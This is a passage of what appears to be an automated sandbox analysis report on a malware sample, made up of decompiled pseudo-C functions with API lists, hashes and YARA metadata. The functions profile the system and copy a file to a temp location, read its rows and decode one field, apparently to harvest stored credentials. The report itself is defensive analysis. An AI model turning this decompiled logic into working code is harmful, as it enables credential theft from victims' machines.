                                                                      • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                      • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                      • API String ID: 3677997916-4173385793
                                                                      • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                      • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                      • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                      • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416584 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 66%
                                                                      			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char _v72;
				_Unknown_base(*)()* _t13;
				intOrPtr _t36;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __eflags;
				_v72 = 0;
				_t38 = __eax;
				 *[fs:eax] = _t41 + 0xffffffbc;
				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				E004028E0( &_v68, 0x40);
				_v68 = 0x40;
				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
				E0040377C(_t38, _v72);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00416615);
				return E00403B80( &_v72);
			}













                                                                      0x00416584
                                                                      0x0041658e
                                                                      0x00416591
                                                                      0x0041659e
                                                                      0x004165b1
                                                                      0x004165c2
                                                                      0x004165c7
                                                                      0x004165d2
                                                                      0x004165e9
                                                                      0x004165f3
                                                                      0x004165fa
                                                                      0x004165fd
                                                                      0x00416600
                                                                      0x0041660d

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                                                                        • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryLoadProcString
                                                                      • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                      • API String ID: 923276998-3878206809
                                                                      • Opcode ID: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
                                                                      • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                      • Opcode Fuzzy Hash: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
                                                                      • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 33%
                                                                      			E00406654(void* __ecx) {
				signed char _t3;
				signed char _t7;
				intOrPtr* _t8;
				signed char* _t11;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t3 = 0;
				 *_t11 = 0;
				if(_t8 != 0) {
					_push(_t11);
					_push(GetCurrentProcess());
					if( *_t8() == 0 ||  *_t11 == 0) {
						_t7 = 0;
					} else {
						_t7 = 1;
					}
					_t3 =  ~_t7;
					asm("sbb eax, eax");
					 *_t11 = _t3;
				}
				asm("sbb eax, eax");
				return _t3 + 1;
			}







                                                                      0x0040666b
                                                                      0x0040666d
                                                                      0x0040666f
                                                                      0x00406674
                                                                      0x00406676
                                                                      0x0040667c
                                                                      0x00406681
                                                                      0x00406689
                                                                      0x0040668d
                                                                      0x0040668d
                                                                      0x0040668d
                                                                      0x0040668f
                                                                      0x00406691
                                                                      0x00406693
                                                                      0x00406693
                                                                      0x0040669a
                                                                      0x0040669f

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressCurrentHandleModuleProcProcess
                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                      • API String ID: 4190356694-3024904723
                                                                      • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                      • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                                                                      • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                      • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t192;
				intOrPtr _t213;
				intOrPtr _t215;
				void* _t221;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				void* _t233;
				void* _t234;

				_t229 = __esi;
				_t190 = __ebx;
				_pop(_t232);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t231 = _t232;
				_t192 = 0xb;
				do {
					_push(0);
					_push(0);
					_t192 = _t192 - 1;
					_t242 = _t192;
				} while (_t192 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t231);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00403B80( &_v28);
				_push(_t231);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t242);
				E004062D8(L"%TEMP%",  &_v64, _t242);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t242);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t192) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t233 = _t232 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t234 = _t233 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L12;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t221);
								E004094C4(_t165,  &_v48, _t221);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t234 = _t234 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L12:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t213);
					 *[fs:eax] = _t213;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t227);
					 *[fs:eax] = _t227;
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                      0x00410e58
                                                                      0x00410e58
                                                                      0x00410e58
                                                                      0x00410e59
                                                                      0x00410e5b
                                                                      0x00410e5d
                                                                      0x00410e5f
                                                                      0x00410e60
                                                                      0x00410e62
                                                                      0x00410e64
                                                                      0x00410e66
                                                                      0x00410e68
                                                                      0x00410e6d
                                                                      0x00410e6f
                                                                      0x00410e71
                                                                      0x00410e73
                                                                      0x00410e78
                                                                      0x00410e78
                                                                      0x00410e7a
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7f
                                                                      0x00410e80
                                                                      0x00410e81
                                                                      0x00410e82
                                                                      0x00410e85
                                                                      0x00410e8b
                                                                      0x00410e92
                                                                      0x00410e93
                                                                      0x00410e98
                                                                      0x00410e9b
                                                                      0x00410ea1
                                                                      0x00410ea8
                                                                      0x00410ea9
                                                                      0x00410eae
                                                                      0x00410eb1
                                                                      0x00410ebc
                                                                      0x00410ec1
                                                                      0x00410ec7
                                                                      0x00410ecc
                                                                      0x00410ecf
                                                                      0x00410edc
                                                                      0x00410ee7
                                                                      0x00410ef4
                                                                      0x00410ef9
                                                                      0x00410efc
                                                                      0x00410f01
                                                                      0x00410f0c
                                                                      0x00410f17
                                                                      0x00410f21
                                                                      0x00410f30
                                                                      0x00410f3b
                                                                      0x00410f46
                                                                      0x00410f51
                                                                      0x00410f60
                                                                      0x00410f7c
                                                                      0x00410f83
                                                                      0x00410f85
                                                                      0x00410f88
                                                                      0x00410f8a
                                                                      0x00410fa2
                                                                      0x00410fb4
                                                                      0x00410fbb
                                                                      0x00410fbd
                                                                      0x00410fc0
                                                                      0x00410fc2
                                                                      0x00411091
                                                                      0x00411095
                                                                      0x0041109c
                                                                      0x0041109f
                                                                      0x004110a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410fd3
                                                                      0x00410fe6
                                                                      0x00410fed
                                                                      0x00410ff5
                                                                      0x00410ff6
                                                                      0x00411004
                                                                      0x00411017
                                                                      0x00411028
                                                                      0x0041103b
                                                                      0x0041104c
                                                                      0x0041105f
                                                                      0x00411066
                                                                      0x00411068
                                                                      0x00411070
                                                                      0x00411075
                                                                      0x00411078
                                                                      0x00411085
                                                                      0x0041108a
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x00411091
                                                                      0x00410fc2
                                                                      0x004110a8
                                                                      0x004110ac
                                                                      0x004110b3
                                                                      0x004110ba
                                                                      0x004110c1
                                                                      0x004110c6
                                                                      0x004110c9
                                                                      0x004110de
                                                                      0x004110ec
                                                                      0x00410f62
                                                                      0x00410f64
                                                                      0x00410f67
                                                                      0x00410f67
                                                                      0x004110f3
                                                                      0x004110f6
                                                                      0x004110f9
                                                                      0x00411106
                                                                      0x0041110e
                                                                      0x00411116
                                                                      0x0041111e
                                                                      0x0041112b
                                                                      0x00411133
                                                                      0x00411140
                                                                      0x00411148
                                                                      0x00411155
                                                                      0x00411162

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410EB4
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CopyCountFileTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 3448371392-3650661790
                                                                      • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                      • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                      • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                      • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 47%
                                                                      			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t191;
				intOrPtr _t212;
				intOrPtr _t214;
				void* _t220;
				intOrPtr _t226;
				intOrPtr _t230;
				intOrPtr _t231;
				void* _t232;
				void* _t233;

				_t228 = __esi;
				_t190 = __ebx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t230 = _t231;
				_t191 = 0xb;
				do {
					_push(0);
					_push(0);
					_t191 = _t191 - 1;
					_t240 = _t191;
				} while (_t191 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t230);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00403B80( &_v28);
				_push(_t230);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t240);
				E004062D8(L"%TEMP%",  &_v64, _t240);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t240);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t191) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t232 = _t231 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t233 = _t232 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L11;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t220);
								E004094C4(_t165,  &_v48, _t220);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t233 = _t233 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L11:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t212);
					 *[fs:eax] = _t212;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t226);
					 *[fs:eax] = _t226;
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                      0x00410e60
                                                                      0x00410e60
                                                                      0x00410e60
                                                                      0x00410e62
                                                                      0x00410e64
                                                                      0x00410e66
                                                                      0x00410e68
                                                                      0x00410e6d
                                                                      0x00410e6f
                                                                      0x00410e71
                                                                      0x00410e73
                                                                      0x00410e78
                                                                      0x00410e78
                                                                      0x00410e7a
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7f
                                                                      0x00410e80
                                                                      0x00410e81
                                                                      0x00410e82
                                                                      0x00410e85
                                                                      0x00410e8b
                                                                      0x00410e92
                                                                      0x00410e93
                                                                      0x00410e98
                                                                      0x00410e9b
                                                                      0x00410ea1
                                                                      0x00410ea8
                                                                      0x00410ea9
                                                                      0x00410eae
                                                                      0x00410eb1
                                                                      0x00410ebc
                                                                      0x00410ec1
                                                                      0x00410ec7
                                                                      0x00410ecc
                                                                      0x00410ecf
                                                                      0x00410edc
                                                                      0x00410ee7
                                                                      0x00410ef4
                                                                      0x00410ef9
                                                                      0x00410efc
                                                                      0x00410f01
                                                                      0x00410f0c
                                                                      0x00410f17
                                                                      0x00410f21
                                                                      0x00410f30
                                                                      0x00410f3b
                                                                      0x00410f46
                                                                      0x00410f51
                                                                      0x00410f60
                                                                      0x00410f7c
                                                                      0x00410f83
                                                                      0x00410f85
                                                                      0x00410f88
                                                                      0x00410f8a
                                                                      0x00410fa2
                                                                      0x00410fb4
                                                                      0x00410fbb
                                                                      0x00410fbd
                                                                      0x00410fc0
                                                                      0x00410fc2
                                                                      0x00411091
                                                                      0x00411095
                                                                      0x0041109c
                                                                      0x0041109f
                                                                      0x004110a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410fd3
                                                                      0x00410fe6
                                                                      0x00410fed
                                                                      0x00410ff5
                                                                      0x00410ff6
                                                                      0x00411004
                                                                      0x00411017
                                                                      0x00411028
                                                                      0x0041103b
                                                                      0x0041104c
                                                                      0x0041105f
                                                                      0x00411066
                                                                      0x00411068
                                                                      0x00411070
                                                                      0x00411075
                                                                      0x00411078
                                                                      0x00411085
                                                                      0x0041108a
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x00411091
                                                                      0x00410fc2
                                                                      0x004110a8
                                                                      0x004110ac
                                                                      0x004110b3
                                                                      0x004110ba
                                                                      0x004110c1
                                                                      0x004110c6
                                                                      0x004110c9
                                                                      0x004110de
                                                                      0x004110ec
                                                                      0x00410f62
                                                                      0x00410f64
                                                                      0x00410f67
                                                                      0x00410f67
                                                                      0x004110f3
                                                                      0x004110f6
                                                                      0x004110f9
                                                                      0x00411106
                                                                      0x0041110e
                                                                      0x00411116
                                                                      0x0041111e
                                                                      0x0041112b
                                                                      0x00411133
                                                                      0x00411140
                                                                      0x00411148
                                                                      0x00411155
                                                                      0x00411162

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410EB4
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CopyCountFileTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 3448371392-3650661790
                                                                      • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                      • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                      • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                      • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				WCHAR* _t90;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr* _t109;
				intOrPtr* _t113;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t158;
				intOrPtr* _t162;
				void* _t164;
				intOrPtr* _t169;
				intOrPtr* _t175;
				intOrPtr* _t181;
				void* _t183;
				intOrPtr* _t187;
				void* _t190;
				intOrPtr _t211;
				intOrPtr _t213;
				void* _t219;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t231;
				void* _t232;

				_t227 = __esi;
				_t189 = __ebx;
				_t70 = __eax | 0x00000a00;
				 *_t70 =  *_t70 + _t70;
				_v117 = _v117 + __edx;
				_t229 = _t230;
				_t190 = 0xb;
				do {
					_push(0);
					_push(0);
					_t190 = _t190 - 1;
					_t238 = _t190;
				} while (_t190 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t70;
				E004040F4( &_v8);
				_push(_t229);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00403B80( &_v28);
				_push(_t229);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t189,  &_v40, _t238);
				E004062D8(L"%TEMP%",  &_v64, _t238);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t189,  &_v44, _t238);
				_t90 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t189, _t190) != 0) {
					_t105 =  *0x41b55c; // 0x41c784
					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
					_t231 = _t230 + 8;
					__eflags = _t107;
					if(_t107 == 0) {
						E00408120(0x66,  &_v76);
						_t150 =  *0x41b5cc; // 0x41c78c
						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t232 = _t231 + 0x14;
						__eflags = _t152;
						if(_t152 == 0) {
							while(1) {
								_t154 =  *0x41b600; // 0x41c790
								_t156 =  *((intOrPtr*)( *_t154))(_v20);
								__eflags = _t156 - 0x64;
								if(_t156 != 0x64) {
									goto L10;
								}
								_t158 =  *0x41b644; // 0x41c798
								_t162 =  *0x41b588; // 0x41c794
								_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
								_pop(_t219);
								E004094C4(_t164,  &_v48, _t219);
								E00403D2C( &_v80, _v48);
								_t169 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
								_t175 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
